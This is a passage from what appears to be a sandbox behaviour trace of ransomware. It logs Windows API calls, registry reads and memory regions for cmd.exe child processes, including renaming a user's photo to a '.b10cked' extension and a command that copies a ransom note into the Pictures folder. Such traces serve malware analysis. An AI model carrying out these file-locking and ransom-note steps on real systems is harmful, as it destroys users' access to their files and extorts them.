lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", lpFilePart=0x24ec74*="EEJHG5~1.JPG") returned 0x38 [0143.894] SetErrorMode (uMode=0x0) returned 0x1 [0143.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x10 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2=".") returned 55 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2="..") returned 55 [0143.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5~1.jpg")) returned 0x20 [0143.895] SetErrorMode (uMode=0x0) returned 0x0 [0143.895] SetErrorMode (uMode=0x1) returned 0x0 [0143.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", nBufferLength=0x104, lpBuffer=0x24f108, lpFilePart=0x24eea0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", lpFilePart=0x24eea0*="EEJHG5~1.JPG") returned 0x38 [0143.895] SetErrorMode (uMode=0x0) returned 0x1 [0143.895] SetErrorMode (uMode=0x0) returned 0x0 [0143.895] SetErrorMode (uMode=0x1) returned 0x0 [0143.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x24f310, lpFilePart=0x24eea0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", lpFilePart=0x24eea0*="EEJhG5emgLWHUyVz.jpg.b10cked") returned 0x48 [0143.895] SetErrorMode (uMode=0x0) returned 0x1 [0143.895] SetLastError (dwErrCode=0x0) [0143.895] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg.b10cked")) returned 0xffffffff [0143.895] GetLastError () returned 0x2 [0143.895] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x24e81c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e81c) returned 0x2f0f70 [0143.895] FindNextFileW (in: hFindFile=0x2f0f70, lpFindFileData=0x24e81c | out: lpFindFileData=0x24e81c) returned 0 [0143.896] GetLastError () returned 0x12 [0143.896] FindClose (in: hFindFile=0x2f0f70 | out: hFindFile=0x2f0f70) returned 1 [0143.897] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x301c98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301c98) returned 0x2f0f70 [0143.897] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x24eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", lpFilePart=0x0) returned 0x48 [0143.897] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg", nBufferLength=0x104, lpBuffer=0x24eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg", lpFilePart=0x0) returned 0x40 [0143.897] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg")) returned 0x20 [0143.897] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.897] FindClose (in: 
hFindFile=0x2f0f70 | out: hFindFile=0x2f0f70) returned 1 [0143.898] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ea68 | out: _Buffer=" 1") returned 9 [0143.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.898] GetFileType (hFile=0x7) returned 0x2 [0143.898] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.898] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e9f4 | out: lpMode=0x24e9f4) returned 1 [0143.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.898] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ea28 | out: lpConsoleScreenBufferInfo=0x24ea28) returned 1 [0143.898] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.898] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ea68 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.899] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ea4c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ea4c*=0x1a) returned 1 [0143.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.899] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.899] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.899] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.899] SetConsoleInputExeNameW () returned 0x1 [0143.899] GetConsoleOutputCP () returned 0x1b5 [0143.899] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.899] SetThreadUILanguage (LangId=0x0) 
returned 0x409 [0143.900] exit (_Code=0) Process: id = "190" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16661 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16662 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16663 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16664 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16665 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16666 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 
16667 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16668 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16669 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16670 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16763 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16764 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16765 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16766 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16767 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 16768 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16769 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 
16770 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16771 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16772 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16773 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16774 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16775 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16776 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16777 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16778 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16779 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = 
"msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16780 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16781 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16782 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16783 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 16784 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 16785 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 16786 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 246 os_tid = 0xfcc [0143.694] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff6c | out: lpSystemTimeAsFileTime=0x2eff6c*(dwLowDateTime=0x8f94cf60, dwHighDateTime=0x1d440a9)) [0143.694] GetCurrentProcessId () returned 0x80c [0143.694] GetCurrentThreadId () returned 0xfcc [0143.694] GetTickCount () returned 0x2ce36 [0143.694] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff64 | out: lpPerformanceCount=0x2eff64*=20048309490) returned 1 [0143.695] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.695] __set_app_type (_Type=0x1) [0143.695] __p__fmode () returned 0x76b331f4 [0143.695] __p__commode () returned 0x76b331fc [0143.695] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.695] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.695] GetCurrentThreadId () returned 0xfcc [0143.695] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfcc) returned 0x38 [0143.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.695] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.695] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efefc | out: phkResult=0x2efefc*=0x0) returned 0x2 [0143.696] VirtualQuery (in: lpAddress=0x2eff33, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.696] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efecc, dwLength=0x1c | out: lpBuffer=0x2efecc*(BaseAddress=0x2f0000, 
AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.696] GetConsoleOutputCP () returned 0x1b5 [0143.696] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.696] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.696] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.696] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.696] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.697] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.697] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.697] GetEnvironmentStringsW () returned 0x1001a8* [0143.698] FreeEnvironmentStringsW (penv=0x1001a8) returned 1 [0143.698] GetEnvironmentStringsW () returned 0x1001a8* [0143.698] FreeEnvironmentStringsW (penv=0x1001a8) returned 1 [0143.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee6c | out: phkResult=0x2eee6c*=0x40) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0xd0, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x0, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegCloseKey (hKey=0x40) returned 0x0 [0143.698] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee6c | out: phkResult=0x2eee6c*=0x40) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x40, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x1, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x0, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.699] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x9, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.699] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x4, lpData=0x2eee78*=0x9, lpcbData=0x2eee70*=0x4) returned 0x0 [0143.699] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee74, lpData=0x2eee78, lpcbData=0x2eee70*=0x1000 | out: lpType=0x2eee74*=0x0, lpData=0x2eee78*=0x9, lpcbData=0x2eee70*=0x1000) returned 0x2 [0143.699] RegCloseKey (hKey=0x40) returned 0x0 [0143.699] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.699] srand (_Seed=0x5b886372) [0143.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"" [0143.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"" [0143.699] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x101908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.699] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.700] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.700] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.700] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.700] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.700] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.700] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.700] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.700] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.700] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.700] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.700] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.700] GetEnvironmentStringsW () returned 0x1022f8* [0143.700] FreeEnvironmentStringsW (penv=0x1022f8) returned 1 [0143.700] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.700] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.700] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.700] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.700] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.700] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.700] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 
[0143.700] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.700] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.700] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.701] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc38, lpFilePart=0x2efc34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efc34*="Desktop") returned 0x18 [0143.701] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.701] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef9b4 | out: lpFindFileData=0x2ef9b4) returned 0x100038 [0143.701] FindClose (in: hFindFile=0x100038 | out: hFindFile=0x100038) returned 1 [0143.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef9b4 | out: lpFindFileData=0x2ef9b4) returned 0x100038 [0143.701] FindClose (in: hFindFile=0x100038 | out: hFindFile=0x100038) returned 1 [0143.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef9b4 | out: lpFindFileData=0x2ef9b4) returned 0x100038 [0143.701] FindClose (in: hFindFile=0x100038 | out: hFindFile=0x100038) returned 1 [0143.702] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.702] 